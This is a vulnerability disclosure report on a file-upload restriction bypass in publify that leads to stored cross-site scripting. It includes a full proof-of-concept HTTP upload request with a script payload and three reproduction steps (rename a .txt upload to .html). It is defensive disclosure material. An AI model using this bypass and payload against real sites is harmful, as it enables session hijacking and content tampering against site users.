Bypass Restriction and File Upload Leads to XSS Stored - TXT to HTML in publify/publify
Reported on
May 19th 2022
Description
Unrestricted file upload allowed the attacker to manipulate the request and bypass the protection of HTML files using a text file, XSS Stored was obtained when uploading the HTML file.
Proof of Concept
POST /admin/resources/upload HTTP/1.1
Host: demo-publify.herokuapp.com
Cookie: _publify_blog_session=SESSION_HERE
Content-Length: 649
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryR7LwpeBoKn4f7hI5
Referer: https://demo-publify.herokuapp.com/admin/resources
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
------WebKitFormBoundaryR7LwpeBoKn4f7hI5
Content-Disposition: form-data; name="utf8"
✓
------WebKitFormBoundaryR7LwpeBoKn4f7hI5
Content-Disposition: form-data; name="authenticity_token"
TOKEN_HERE
------WebKitFormBoundaryR7LwpeBoKn4f7hI5
Content-Disposition: form-data; name="upload"; filename="w00t.txt" -- Change to w00t.html
Content-Type: text/plain
<script>alert('OOPSS');</script>
------WebKitFormBoundaryR7LwpeBoKn4f7hI5
Content-Disposition: form-data; name="commit"
Upload
------WebKitFormBoundaryR7LwpeBoKn4f7hI5--
Step 1 - Upload a .txt file and intercept the request
Step 2 - Change the extension of filename to .html
Step 3 - Submit a request and the file will be uploaded successfully
Video
https://drive.google.com/file/d/1bNffqwUl_9Sn7wqpBvEAqvV_PGRadlPb/view?usp=sharing
Impact
Successful exploitation of cross-site scripting vulnerabilities allows an attacker to run arbitrary script code in the context of the affected user. This can be used to compromise the integrity of content returned by the webserver to take over a user's session, redirect the user to a malicious website.